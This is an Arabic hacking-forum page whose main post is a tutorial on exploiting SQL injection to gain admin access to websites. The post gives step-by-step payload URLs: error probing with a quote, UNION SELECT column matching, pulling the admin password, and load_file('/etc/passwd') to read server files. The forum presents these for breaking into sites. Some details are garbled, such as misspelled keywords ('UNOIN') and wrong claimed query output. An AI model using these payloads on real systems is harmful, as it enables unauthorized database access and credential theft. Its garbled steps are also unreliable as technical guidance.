منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقاأكبر منتدى هكر عربي متخصص بجديد الثغرات واختراق المواقع والأجهزة.منتدى إختراق البريد والايميلات- قسم اختراق دورة إحتراف التلغيمدورة اختراق IPs من نوع SIPو VOIP‎دورة كشف التلغيم‎دورة اختراق الأجهزة‎دورة
 
الرئيسيةأحدث الصورالتسجيلدخول


تحياتي لك الباب مفتوح لي في جميع الاقسام الذي تريده عند المشاركه  اي استفسار انا جاهز ان شاء الله
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
المواضيع الأخيرة
» انشاء ./payload
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالأربعاء أغسطس 11, 2021 12:03 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» دروس تعلم فنون الهكرز للمبتدئين
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالجمعة ديسمبر 29, 2017 1:33 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» اقوى كود ازالة حسابات الفيس بوك
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالجمعة ديسمبر 29, 2017 1:27 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» عملاق التحميل من التورنت Vuze 5.6.0.0 الجديد كليا واحدث الادوات والاصدرات
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالسبت مارس 07, 2015 11:36 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج FastPictureViewer 1.9 Build 342 لتعديل و عرض الصور بكل سهوله
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالأربعاء مارس 04, 2015 3:57 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» احدث فلود اضافات روم 2015
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالأربعاء مارس 04, 2015 10:20 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]VB6[ أفضل الطرق لتجميل برامجك شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:58 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثالث -الجمل الشرطية و الدوارات شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:55 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثاني -المتغيرات شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:53 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ الدرس الاول تعلم خطوة بخطوة , مع الإجابة عن أي سؤال شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:52 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الثانية اضافةالبيانات بالـ LINQ شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:47 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الاولى لأستيعاب الـ LINQ شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:45 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ عمل برامج للاجهزه النقاله والPDA‏ شبكة الجنرال صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالثلاثاء مارس 03, 2015 10:41 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

نوفمبر 2024
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
    123
45678910
11121314151617
18192021222324
252627282930 
اليوميةاليومية
التبادل الاعلاني

انشاء منتدى مجاني



أفضل 10 فاتحي مواضيع
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
جنـرال الـهكـر
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
رابح..زيرؤ.فؤر.ايفر
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
ابوعلي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
سنايبر1
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
ملك الهكر
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
العاشق
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
الساحر
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
__alsafa7__
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
صدام الشرعبي
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
أفضل 10 أعضاء في هذا المنتدى
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے - 1851
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
رابح..زيرؤ.فؤر.ايفر - 300
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
جنـرال الـهكـر - 227
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
سنايبر1 - 146
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
ابوعلي - 55
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
العاشق - 49
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
نسيـم البحـر1 - 27
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
ملك الهكر - 27
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
لووورد اليمن - 24
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
__alsafa7__ - 18
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_rcap1شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Voting_barشرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Vote_lcap1 
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية reddit      

https://sadam-alsharabi.roo7.biz

قم بحفض و مشاطرة الرابط منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات على موقع حفض الصفحات
تصويت
احصائيات
هذا المنتدى يتوفر على 2284 عُضو.
آخر عُضو مُسجل هو Mahrr فمرحباً به.

أعضاؤنا قدموا 3052 مساهمة في هذا المنتدى في 2055 موضوع

 

 شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن

اذهب الى الأسفل 
كاتب الموضوعرسالة
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے


السٌّمعَة : 47
تاريخ التسجيل : 19/11/2012
العمر : 34
الموقع : https://m.facebook.com/profile.php?id=465134066889659

شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Empty
مُساهمةموضوع: شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن    شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن  Icon_minitimeالخميس يناير 17, 2013 10:03 pm

بسم الله الرحمان الرحيم 
السلام عليكم و رحمة الله تعالى و براكته 

تعريف SQL-injection :- 
هي تقنيه المستخدمة للاستفادة من الضعف اصدار عن اوامر الكترونيه عبر شبكة لتنفيذ التطبيق من قاعدة البيانات الخلفية ( SQL ) وطبعا المهاجمون يعملون علي الاستفادة الحقيقة من هذا الضعف للوصول الي المعلومات السريه الخاص بالموقع 

نبداء شرح استغل SQL-injection عن طريق الخطاء
mysql_fecth_array()

مثل الموقع المستهدف
[****]
كود:
http://www.site.com/index.php?id=1


طبعا لكتشاف الخطاء هنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل
[****]
كود:
1'


ليكون بالشكل الاتي في HTTP

[****]
كود:
http://www.site.com/index.php?id=1'


طبعا القاعد لم تستطيع التعرف علي الرمز 1'
هيظهر الخطاء ان الامر خطاء
هيكون 
[****]
كود:
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in 
/home/site/index.php on line N


خطاء قواعد البيانات في الداله
Warning: mysql_fecth_array(): 
هنا يمكن الاستغلال مباشر لل SQL-injection
وفي نفس الوقت ظهر لينا مكان الموقع علي السيرفر 
home/site/index.php 

بنداء دلوقتي في تطبيق SQL-injection
[****]
كود:
UNION SELECT null/*

UNION والامر هذا يستخدم لإضافة استعلام اخر تابع للاستعلام المصاب بالثغره 
SELECT : وهذا الامر عن طريقه يتم استخراج البيانات
Null : وهذا الامر لظبط عدد columns مع القاعده وطبعا بتفضل تزود null للربط بالقاعد
المهم شوف الفديو ده علي لكي تفهم
http://www.wdzone.net/Public/video/MYSQLROOT.rar

المهم بعد كده هنجرب نبداء ب null واحده
[****]
كود:
http://www.site.com/index.php?id=1'UNION SELECT null/*


للاسف لم تربط بالقاعده هنجرب 2 null
[****]
كود:
http://www.site.com/index.php?id=1'UNION SELECT null,null/*


كده ربط بالقاعده طيب دلوقتي عايزين نعرف Table في القاعده
بستخدام الامر DATABASE() وهنضيف الداله دفي اخر null
[****]
كود:
http://www.site.com/index.php?id=1'UNION SELECT null,DATABASE()/*


هيكون الناتج 
[****]
كود:
USER()
PASSWORD()
VERSION()


طبعا الجداول دي ايوزر بتاع اسم المستخدم و الباسورد بتاع باسورد الادمن
وهيكون الاستعلام لستخراج الباسورد
[****]
كود:
http://www.site.com/index.php?id=1'UNOIN SELECT null,password /*


و امر استخراج اليوزر 
[****]
كود:
http://www.site.com/index.php?id=1'UNOIN SELECT null,password WHERE user='admin' /*


البعض هيقول طيب SQL-injection فاشله علي شان بتجيب الباسورد MD5
لكن هوريك امر يعتبر فيل انكلود وهو بستخدام الامر load_file()
وهيكون الاستعلام فيه

[****]
كود:
http://www.site.com/index.php?id=1'UNOIN SELECT null,load_file('/etc/passwd')/*


و الامر ده هيعرض ليك PAsswd يعني يتم الاستغل فيل انكلود وشوف الفديو ده وانت تعرف خطوره الداله file_load
شوف الفديو ‏

http://www.wdzone.net/Public/video/INclude.rar
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://sadam-alsharabi.roo7.biz
 
شرح استغلال ثغرة sqlو الدخول بصلاحية الادمن
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» استغلال ثغرة xss
» استغلال ثغرة الهوتميل html
» الدرس الثالث جزء الثاني: استغلال ثغرة xss
» الدرس الثالث جزء الثاني: استغلال ثغرة xss
» الدرس الثالث جزء الثاني: استغلال ثغرة xss

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات :: الفئة الأولى :: المنتدى الأول :: طرق وبرامج اختراق المواقع والسيرفرات-
انتقل الى: